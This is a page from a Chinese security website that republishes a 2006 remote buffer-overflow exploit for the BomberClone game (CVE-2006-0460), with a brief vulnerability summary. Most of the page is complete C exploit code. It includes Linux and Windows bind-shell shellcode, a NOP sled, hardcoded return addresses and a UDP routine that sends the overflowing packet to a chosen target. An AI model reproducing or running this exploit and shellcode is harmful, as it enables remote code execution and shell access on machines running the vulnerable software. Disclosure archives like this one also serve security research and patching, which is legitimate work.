首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BomberClone Buffer Overflow Exploit
来源:http://bash.org.ru/quote.php?num=15296 作者:escazoo 发布时间:2006-03-23  

BomberClone Buffer Overflow (Exploit)

Summary
BomberClone is a clone of the game AtomicBomberMan, it have network support allowing to play it over the Internet.

A Buffer overflow vulnerability in BomberClone allows remote code execution.

Credit:
The original article can be found at:
http://bash.org.ru/quote.php?num=15296

Details
Vulnerable Systems:
* BomberClone versions prior to 0.11.6.2

Exploit:
/*
* bomberclone < 0.11.6.2 remote exploit
* CVE-2006-0460
* 3/14/06
* escazoo@yahoo.com
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* fork() + bind() port 31337 - ty izik */
char linux_shellcode[]=
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80"
"\x5b\x5d\x52\x66\xbd\x69\x7a\x0f\xcd\x09\xdd\x55\x6a\x10\x51"
"\x50\x89\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5f\x50"
"\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x93\xb0\x02\xcd\x80\x85\xc0"
"\x75\x1a\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xb2\x6a\x06\x58"
"\xcd\x80\xb3\x04\xeb\xc9";

/* bind shell to 4444 - metasploit */
char win32_shellcode[] =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x36"
"\xbc\x74\xb1\x83\xeb\xfc\xe2\xf4\xca\xd6\x9f\xfc\xde\x45\x8b\x4e"
"\xc9\xdc\xff\xdd\x12\x98\xff\xf4\x0a\x37\x08\xb4\x4e\xbd\x9b\x3a"
"\x79\xa4\xff\xee\x16\xbd\x9f\xf8\xbd\x88\xff\xb0\xd8\x8d\xb4\x28"
"\x9a\x38\xb4\xc5\x31\x7d\xbe\xbc\x37\x7e\x9f\x45\x0d\xe8\x50\x99"
"\x43\x59\xff\xee\x12\xbd\x9f\xd7\xbd\xb0\x3f\x3a\x69\xa0\x75\x5a"
"\x35\x90\xff\x38\x5a\x98\x68\xd0\xf5\x8d\xaf\xd5\xbd\xff\x44\x3a"
"\x76\xb0\xff\xc1\x2a\x11\xff\xf1\x3e\xe2\x1c\x3f\x78\xb2\x98\xe1"
"\xc9\x6a\x12\xe2\x50\xd4\x47\x83\x5e\xcb\x07\x83\x69\xe8\x8b\x61"
"\x5e\x77\x99\x4d\x0d\xec\x8b\x67\x69\x35\x91\xd7\xb7\x51\x7c\xb3"
"\x63\xd6\x76\x4e\xe6\xd4\xad\xb8\xc3\x11\x23\x4e\xe0\xef\x27\xe2"
"\x65\xef\x37\xe2\x75\xef\x8b\x61\x50\xd4\x65\xed\x50\xef\xfd\x50"
"\xa3\xd4\xd0\xab\x46\x7b\x23\x4e\xe0\xd6\x64\xe0\x63\x43\xa4\xd9"
"\x92\x11\x5a\x58\x61\x43\xa2\xe2\x63\x43\xa4\xd9\xd3\xf5\xf2\xf8"
"\x61\x43\xa2\xe1\x62\xe8\x21\x4e\xe6\x2f\x1c\x56\x4f\x7a\x0d\xe6"
"\xc9\x6a\x21\x4e\xe6\xda\x1e\xd5\x50\xd4\x17\xdc\xbf\x59\x1e\xe1"
"\x6f\x95\xb8\x38\xd1\xd6\x30\x38\xd4\x8d\xb4\x42\x9c\x42\x36\x9c"
"\xc8\xfe\x58\x22\xbb\xc6\x4c\x1a\x9d\x17\x1c\xc3\xc8\x0f\x62\x4e"
"\x43\xf8\x8b\x67\x6d\xeb\x26\xe0\x67\xed\x1e\xb0\x67\xed\x21\xe0"
"\xc9\x6c\x1c\x1c\xef\xb9\xba\xe2\xc9\x6a\x1e\x4e\xc9\x8b\x8b\x61"
"\xbd\xeb\x88\x32\xf2\xd8\x8b\x67\x64\x43\xa4\xd9\xd9\x72\x94\xd1"
"\x65\x43\xa2\x4e\xe6\xbc\x74\xb1";

struct pkgheader {
unsigned char typ;
unsigned char flags;
signed short id;
signed short led;
} pkgheader;

struct pkg_error {
struct pkgheader h;
unsigned char nr;
char text[816];
} pkg_error;

int main(int argc, char *argv[]) {
char *ptr;
int sockfd, i;
long *addrptr, ret;
struct sockaddr_in vict;

if(argc < 4) {
fprintf(stderr, "%s IP Port [target]\n", argv[0]);
return -2;
}


memset(pkg_error.text, 0x90, sizeof(pkg_error.text));
if(!strcmp(argv[3], "win32")) {
ret = 0x77dab1da;
memcpy(pkg_error.text + 701 - strlen(win32_shellcode), win32_shellcode, strlen(win32_shellcode));
}
else {
ret = 0xbffff164;
memcpy(pkg_error.text + 701 - strlen(linux_shellcode), linux_shellcode, strlen(linux_shellcode));
}

pkg_error.h.typ = 0;
pkg_error.h.flags = 0;
pkg_error.h.led = sizeof(struct pkg_error);
pkg_error.nr = 'A';

ptr = pkg_error.text + 732;
addrptr = (long *)ptr;
for(i = 732; i < sizeof(pkg_error.text); i+=4)
*(addrptr++) = ret;

vict.sin_family = PF_INET;
vict.sin_port = htons(atoi(argv[2]));
vict.sin_addr.s_addr = inet_addr(argv[1]);
memset(&(vict.sin_zero), '\0', 8);

if((sockfd = socket(PF_INET, SOCK_DGRAM, 0)) < 0) {
perror("socket");
return -1;
}

if(connect(sockfd, (struct sockaddr *)&vict,
sizeof(vict)) < 0) {
perror("connect");
return -1;
}

if(send(sockfd, &pkg_error, sizeof(pkg_error), 0) < 0) {
perror("send");
return -1;
}

close(sockfd);

return 0;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·X.Org X11 (X11R6.9.0/X11R7.0)
·Apple Mac OS X File Rewrites a
·A vulnerability in HT 9.1 Expl
·FarsiNews Remote File Inclusio
·Mercur IMAPD Buffer Overflow (
·IGMP v3 DoS (MS06-007, Exploit
·MyBB version 1.04 and prior SQ
·ASPPortal <= 3.1.1 Remote S
·KnowledgebasePublisher 1.2 Rem
·The IIS Worker Process (w3wp)
·Microsoft Windows Telephony Se
·VWar Remote Code Execution (Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved